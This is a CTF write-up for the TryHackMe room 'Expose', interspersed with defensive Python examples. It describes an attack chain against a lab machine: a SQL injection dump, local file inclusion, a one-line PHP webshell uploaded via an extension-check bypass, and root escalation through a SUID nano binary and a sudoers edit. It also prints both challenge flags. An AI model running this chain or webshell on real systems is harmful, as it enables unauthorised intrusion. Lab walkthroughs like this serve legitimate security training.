Intro
Hi, after some time I'm writing a small write-up again. Today it's about the CTF "Expose", which can be found on the TryHackMe platform. You have to find two flags in this challenge. Just create an account and off you go 😄
Discovery
Ok, let's go! The first thing I did was run an nmap scan against the target IP address 10.10.180.99. After some time I got the results below, which look interesting.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-10-01 16:40 CEST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating Ping Scan at 16:40
Scanning 10.10.180.99 [4 ports]
Completed Ping Scan at 16:40, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:40
Completed Parallel DNS resolution of 1 host. at 16:40, 0.04s elapsed
Initiating SYN Stealth Scan at 16:40
Scanning 10.10.180.99 [65535 ports]
Discovered open port 22/tcp on 10.10.180.99
Discovered open port 53/tcp on 10.10.180.99
Discovered open port 21/tcp on 10.10.180.99
Discovered open port 1337/tcp on 10.10.180.99
Discovered open port 1883/tcp on 10.10.180.99
Completed SYN Stealth Scan at 16:40, 17.52s elapsed (65535 total ports)
Initiating Service scan at 16:40
Scanning 5 services on 10.10.180.99
Completed Service scan at 16:40, 11.23s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 10.10.180.99
Retrying OS detection (try #2) against 10.10.180.99
Retrying OS detection (try #3) against 10.10.180.99
Retrying OS detection (try #4) against 10.10.180.99
Retrying OS detection (try #5) against 10.10.180.99
Initiating Traceroute at 16:40
Completed Traceroute at 16:40, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 16:40
Completed Parallel DNS resolution of 2 hosts. at 16:40, 0.08s elapsed
NSE: Script scanning 10.10.180.99.
Initiating NSE at 16:40
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 16:40, 8.68s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.37s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.01s elapsed
Nmap scan report for 10.10.180.99
Host is up (0.045s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.4.174
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ca:24:e4:a3:07:8b:bb:9f:e6:57:4f:5b:6e:30:d3:d2 (RSA)
| 256 1c:c5:28:08:0a:2c:5f:b2:55:8f:ba:9e:24:12:82:2f (ECDSA)
|_ 256 cd:e2:e2:92:ee:bf:59:03:fa:af:8a:f7:fb:f9:40:68 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
1337/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: EXPOSED
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
1883/tcp open mosquitto version 1.6.9
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/load/publish/sent/1min: 28.32
| $SYS/broker/load/messages/received/15min: 0.20
| $SYS/broker/load/messages/received/5min: 0.58
| $SYS/broker/clients/active: 1
| $SYS/broker/bytes/received: 69
| $SYS/broker/load/bytes/received/1min: 60.29
| $SYS/broker/clients/maximum: 1
| $SYS/broker/messages/stored: 36
| $SYS/broker/clients/connected: 1
| $SYS/broker/subscriptions/count: 2
| $SYS/broker/clients/disconnected: 0
| $SYS/broker/load/connections/1min: 1.67
| $SYS/broker/load/sockets/5min: 0.38
| $SYS/broker/load/messages/sent/5min: 6.67
| $SYS/broker/load/publish/sent/5min: 6.09
| $SYS/broker/clients/inactive: 0
| $SYS/broker/publish/messages/sent: 31
| $SYS/broker/heap/maximum: 52384
| $SYS/broker/load/bytes/received/15min: 4.56
| $SYS/broker/load/sockets/1min: 1.55
| $SYS/broker/load/messages/received/1min: 2.59
| $SYS/broker/load/connections/15min: 0.13
| $SYS/broker/load/publish/sent/15min: 2.05
| $SYS/broker/bytes/sent: 1219
| $SYS/broker/uptime: 649 seconds
| $SYS/broker/load/connections/5min: 0.39
| $SYS/broker/heap/current: 51984
| $SYS/broker/load/sockets/15min: 0.13
| $SYS/broker/store/messages/count: 36
| $SYS/broker/store/messages/bytes: 156
| $SYS/broker/retained messages/count: 39
| $SYS/broker/publish/bytes/sent: 129
| $SYS/broker/load/bytes/sent/1min: 1113.17
| $SYS/broker/load/bytes/sent/15min: 80.77
| $SYS/broker/messages/sent: 34
| $SYS/broker/load/bytes/received/5min: 13.42
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/load/bytes/sent/5min: 239.36
| $SYS/broker/messages/received: 3
| $SYS/broker/load/messages/sent/15min: 2.25
| $SYS/broker/load/messages/sent/1min: 30.91
|_ $SYS/broker/clients/total: 1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=10/1%OT=21%CT=1%CU=38251%PV=Y%DS=2%DC=T%G=Y%TM=6519
OS:84F8%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508S
OS:T11NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)E
OS:CN(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%
OS:CD=S)
Uptime guess: 36.921 days (since Fri Aug 25 18:34:07 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 43.17 ms 10.11.0.1
2 44.47 ms 10.10.180.99
NSE: Script Post-scanning.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.26 seconds
Raw packets sent: 65809 (2.900MB) | Rcvd: 65733 (2.633MB)
Well, there are some interesting ports open!
vsftpd on port 21, which also allows anonymous login. That is definitely the service I want to check out first. (Note the two versions in the output: nmap's signature match says "2.0.8 or later", while the STAT banner from the ftp-syst script says vsFTPd 3.0.3; the banner is the more reliable of the two.) DNS (ISC BIND 9.16.1) on port 53/TCP, which may allow zone transfers. An HTTP server on port 1337, which I should open in my browser. The last service is mosquitto on port 1883, which is an MQTT message broker mostly used for IoT. Interesting that nmap already listed several topics; everything shown there is $SYS/ broker statistics, so it is still worth subscribing to all topics to see whether any application topics are published.
First of all I want to look at the files hosted on FTP. Nah, we got nothing.
I tried to upload something and got a "permission denied" error as well. Well, this service is useless at the moment, but it may be useful later.
Zone transfers with...
dig axfr 10.10.180.99
also didn't work for me, and neither did other DNS requests. (Keep in mind that dig needs the zone name in addition to the server, as in dig axfr <zone> @10.10.180.99; without a domain name to ask for, there is nothing to transfer.) That told me I had to look at the HTTP service on port 1337.
Visiting port 1337 with my web browser shows me this page.
At the same time I ran nikto to discover some additional information about the HTTP server running on port 1337.
Well, we see that there is an admin directory.
At the same time gobuster tells me there is also a phpmyadmin folder. Is the idea of the challenge that I have to break into phpMyAdmin somehow? First I want to find out what is behind the path /admin.
Visiting the URL "http://10.10.180.99:1337/admin/" shows me this nice login.
After a few tries to provoke some kind of error by entering dummy credentials, I got the thought: what if this login panel is fake? So I decided to look at what I can find under the path /phpmyadmin. Ok, as I thought, it is phpMyAdmin. For me that was the trigger to search for the phpMyAdmin version and its known vulnerabilities; maybe I would find a suitable exploit. But nothing!
I decided to subscribe to all topics on the MQTT service on port 1883; maybe I get more information.
Some minutes later I got suspicious: did I overlook something? I started gobuster again with a different wordlist to brute-force the directories, hoping to find more. This time I used the default wordlists from dirb to enumerate the directories.
And yes, I got more directories I can look at.
The first directory I want to check out is admin_101; maybe that is the non-fake admin panel. Before I do that, I add an /etc/hosts entry mapping expose.thm to the IP address.
Well, we see the email field is pre-filled with the address "hacker@root.thm". Could that be the real domain of the VM? I also added an /etc/hosts entry pointing root.thm to the IP address. I will enumerate DNS subdomains with wfuzz later.
Well, I entered the single character a as the password for that user and got an error. In the console of the browser's developer tools I can see that an SQL query was returned in the response. That is the classic sign of an injection point: the input reached the query unescaped and the database error was not suppressed.
Ok, for me it's time to fire up sqlmap to test whether there is an SQL injection vulnerability. A few minutes later sqlmap reported that the parameter email is vulnerable and that I could dump the entire database.
And it's done. The whole database expose was dumped.
Initial access
The user hacker@root.thm really exists in the table user, and his password is stored in cleartext in that table.
The table config looks pretty interesting because of the password hash and the file paths.
The first file, /file1010111/index.php, sounds interesting; maybe there is a hidden admin panel? The second file, /upload-cv00101011/index.php, sounds like arbitrary file upload to me, but there is more: the file can only be used by a user whose name starts with the letter z.
Well, I have to try the credentials on the admin panel.
Ok, a pretty nice start page greets me. This could be something like "ChatGPT". I analyzed the source code of this page, but there was nothing. I think this is not the right way, and I have to look at the other two files listed in the table config. The first file I visited was /file1010111/index.php, with the password from the config table. And got this page.
Well, the page says "Parameter fuzzing is also important :) or Can you hide DOM elements?". I looked at the source code of this page and got the hint that there is a GET parameter file or view.
I tried the parameter file first; maybe I've found an LFI? The first thing I tried was to include the file /etc/passwd from the target machine. And yes, it looks like an LFI. I saved the contents of this file and analyzed which users I could find on that system.
There are two users I may be able to use for upgrading my shell once I have initial access. The first user is ubuntu and the second is zeamkish, which starts with the letter z.
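The following is an added example, not code from the write-up or from the challenge, covering the two things this step involves: how a file= parameter that is passed straight to an include turns into a local file inclusion (with the containment check that stops it), and how to pull the accounts worth targeting out of a leaked /etc/passwd. The include directory layout is made up for the demo and the passwd excerpt is constructed; only the two account names ubuntu and zeamkish come from the target.

```python
"""Added example (not from the write-up): LFI via ?file=, a fix, and passwd triage."""
import os
import tempfile


def include_vulnerable(base_dir, requested):
    """Mirrors include($_GET['file']) relative to a web directory: '../'
    walks out of it, so anything the web server user can read is returned."""
    with open(os.path.join(base_dir, requested)) as fh:
        return fh.read()


def include_safe(base_dir, requested):
    """Resolve symlinks and '..' first, then require the result to stay
    inside base_dir. Rejecting the literal string '..' is not enough."""
    root = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("path escapes include directory: %r" % requested)
    with open(target) as fh:
        return fh.read()


def interactive_users(passwd_text, min_uid=1000):
    """Accounts worth trying for SSH or su: regular UIDs with a login shell."""
    users = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, _, uid, _, _, home, shell = parts
        if int(uid) >= min_uid and not shell.endswith(("nologin", "false")):
            users.append((name, home))
    return users


# Constructed excerpt; only 'ubuntu' and 'zeamkish' are from the target.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
zeamkish:x:1001:1001::/home/zeamkish:/bin/bash
"""


def demo():
    """Build a fake web root with an include dir and a secret file outside it,
    then exercise both include functions and the passwd parser."""
    tmp = tempfile.mkdtemp()
    inc = os.path.join(tmp, "www", "includes")
    os.makedirs(inc)
    with open(os.path.join(inc, "about.php"), "w") as fh:
        fh.write("about page")
    with open(os.path.join(tmp, "passwd"), "w") as fh:
        fh.write(SAMPLE_PASSWD)
    traversal = "../../passwd"          # on the box: ../../../etc/passwd
    leaked = include_vulnerable(inc, traversal)
    try:
        include_safe(inc, traversal)
        blocked = False
    except PermissionError:
        blocked = True
    return {
        "legit_works": include_safe(inc, "about.php") == "about page",
        "vulnerable_leaks": leaked == SAMPLE_PASSWD,
        "safe_blocks": blocked,
        "users": [name for name, _ in interactive_users(leaked)],
    }


if __name__ == "__main__":
    print(demo())
```

The parser filters on UID and shell rather than on the name, which is why ubuntu and zeamkish surface while www-data and the daemon accounts do not; that is the same triage done by hand in the step above.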
I visited the second file, entered the username as the password and voilà, I'm in.
Ok, I have a file upload here. Maybe there is a chance of arbitrary file upload where I can upload a shell. I created a simple PHP shell with the following code:
<?php echo system($_GET['id']);?>
I saved this shell as shell.php.png to bypass the extension filter. With Burp Suite, I used Repeater to edit my request and upload the shell as a .php file. And it worked! So the extension check is not enforced on the server for the filename actually received; editing the intercepted request is enough.
The next thing I did was create a reverse shell with msfvenom to get a better shell for initial access to the files on that system.
I uploaded it with the same method and got a command shell session in Metasploit, nice.
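To make the bypass concrete, here is an added example, not code from the write-up or from the challenge. It contrasts two server-side upload policies for a CV upload: one that trusts the client-declared content type and stores the file under the client's name (equivalent to a check that only lives in the browser, which is what renaming the file in Burp Repeater defeats), and one that decides from an extension allow-list, the file's own leading bytes, a scan for a PHP open tag, and a server-chosen name. The upload directory path, the field names and the list of accepted types are assumptions.

```python
"""Added example (not from the write-up): weak vs. strict upload acceptance."""
import os
import secrets
from typing import Optional

# Assumed allow-list: extension -> magic bytes the file must start with.
ALLOWED = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".pdf": b"%PDF-"}
UPLOAD_DIR = "/var/www/html/upload-cv00101011/"      # assumed location

# The write-up's one-line shell, used here as the upload body.
PHP_SHELL = b"<?php echo system($_GET['id']);?>"


def accept_weak(filename: str, content_type: str, data: bytes) -> Optional[str]:
    """Checks only the client-declared type and keeps the client's name.
    Both values are attacker-controlled, so editing the multipart request
    (change 'shell.php.png' to 'shell.php', keep 'image/png') gets through."""
    if not content_type.startswith("image/"):
        return None
    return os.path.join(UPLOAD_DIR, os.path.basename(filename))


def accept_strict(filename: str, content_type: str, data: bytes) -> Optional[str]:
    """Allow-listed final extension, magic bytes matching that extension,
    no PHP open tag anywhere in the body, and a random server-side name so
    the client never chooses the stored path. content_type is ignored."""
    ext = os.path.splitext(filename)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None or not data.startswith(magic):
        return None
    if b"<?" in data:                     # polyglot: real image header, PHP in the tail
        return None
    return os.path.join(UPLOAD_DIR, secrets.token_hex(16) + ext)


def run_cases(policy):
    """Five constructed requests: an honest PNG, the shell renamed in Burp,
    the double-extension shell with a spoofed type, a PNG-headed polyglot,
    and the shell sent honestly as PHP."""
    png = ALLOWED[".png"] + b"\x00" * 16
    cases = {
        "real_png": ("cv.png", "image/png", png),
        "renamed_shell": ("shell.php", "image/png", PHP_SHELL),
        "double_ext": ("shell.php.png", "image/png", PHP_SHELL),
        "polyglot": ("cv.png", "image/png", png + PHP_SHELL),
        "declared_php": ("shell.php", "application/x-php", PHP_SHELL),
    }
    return {name: policy(*args) is not None for name, args in cases.items()}


if __name__ == "__main__":
    print("weak:  ", run_cases(accept_weak))
    print("strict:", run_cases(accept_strict))
```

The strict policy keys on the last extension and ignores the declared content type, because the latter is just another request header. The random server-side name matters on its own: Apache's mod_php handler is commonly configured with AddHandler, which matches any file whose name contains .php anywhere, so even a stored shell.php.png can be executed under that configuration.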
First flag
After getting initial access, I decided to read the files of the admin panel to get the database credentials, which I could use for phpMyAdmin.
I don't know why, but I also listed the home directories of both users, and I found a file called ssh_creds.txt that everyone can read, including me!
With these credentials I got a shell via SSH, which is definitely better than the reverse shell.
The first thing for me was to read the file flag.txt.
User:THM{USER_FLAG_1231_EXPOSE}
Escalating privileges
The next logical step is to escalate privileges to root. The first thing I did was to enumerate all SUID binaries.
Searched and found! Why is the editor nano listed as a SUID binary?
Ok, well done I would say. I tested the editor by reading the file /etc/shadow, which holds the password hashes of all users on that system. A SUID-root nano does not drop privileges, so it can open, and write, any file on the box as root.
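The usual one-liner for this step is find / -perm -4000 -type f 2>/dev/null; the following is an added example, not code from the write-up, that does the same walk in Python and compares the result against a baseline of binaries that are SUID on a stock Ubuntu, so that the odd one out (nano here) stands out instead of being read off a long list by eye. The baseline set is an assumption about a default install, and the demo builds a throwaway directory tree rather than scanning the real filesystem.

```python
"""Added example (not from the write-up): SUID enumeration with a baseline diff."""
import os
import stat
import sys
import tempfile

# Assumed baseline: binaries that are SUID-root on a stock Ubuntu 20.04.
# Anything outside this set deserves a look (and a GTFOBins search).
EXPECTED = {"sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
            "mount", "umount", "fusermount", "pkexec", "ssh-keysign"}

# Pseudo-filesystems that are pointless (and slow) to walk.
SKIP = {"/proc", "/sys", "/dev", "/run"}


def find_suid(root="/"):
    """Return (path, owner_uid) for every regular file under root that has
    the set-user-ID bit. Unreadable directories are skipped, not fatal,
    and symlinks are not followed (lstat), matching find's behaviour."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_uid))
    return found


def suspicious(entries):
    """SUID files whose basename is not in the expected baseline."""
    return [path for path, _ in entries if os.path.basename(path) not in EXPECTED]


def demo():
    """Self-contained run: a fake tree with one expected SUID binary, one
    unexpected one (nano) and one ordinary file, then scan it."""
    tmp = tempfile.mkdtemp()
    bindir = os.path.join(tmp, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("passwd", 0o4755), ("nano", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    entries = find_suid(tmp)
    return (sorted(os.path.basename(p) for p, _ in entries),
            [os.path.basename(p) for p in suspicious(entries)])


if __name__ == "__main__":
    # With no argument, scan the live system; with one, scan that tree.
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    entries = find_suid(root)
    for path, uid in entries:
        print(uid, path)
    print("unexpected:", suspicious(entries))
```

Diffing against a baseline is what turns "a list of twenty SUID files" into "nano is SUID, why?"; on a real engagement the baseline should come from a clean image of the same distribution rather than from memory.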
Now that I effectively have root privileges, I want to keep them for my current user zeamkish. I just edited the file /etc/sudoers to grant this user full sudo rights. A caveat: sudoers is normally edited with visudo, which refuses to save a file with a syntax error; with a SUID editor there is no such check, and a broken sudoers disables sudo for everyone, so keep the added line minimal and exact.
Rootflag
Now I have to run sudo -i and I should be logged in as root.
I'm root, and here is the root flag:
root:THM{ROOT_EXPOSED_1001}
That concludes the challenge.
This challenge was fun to do and I found it very refreshing, so for beginners it is definitely recommended 😄
I hope you enjoyed it and see you next time 😄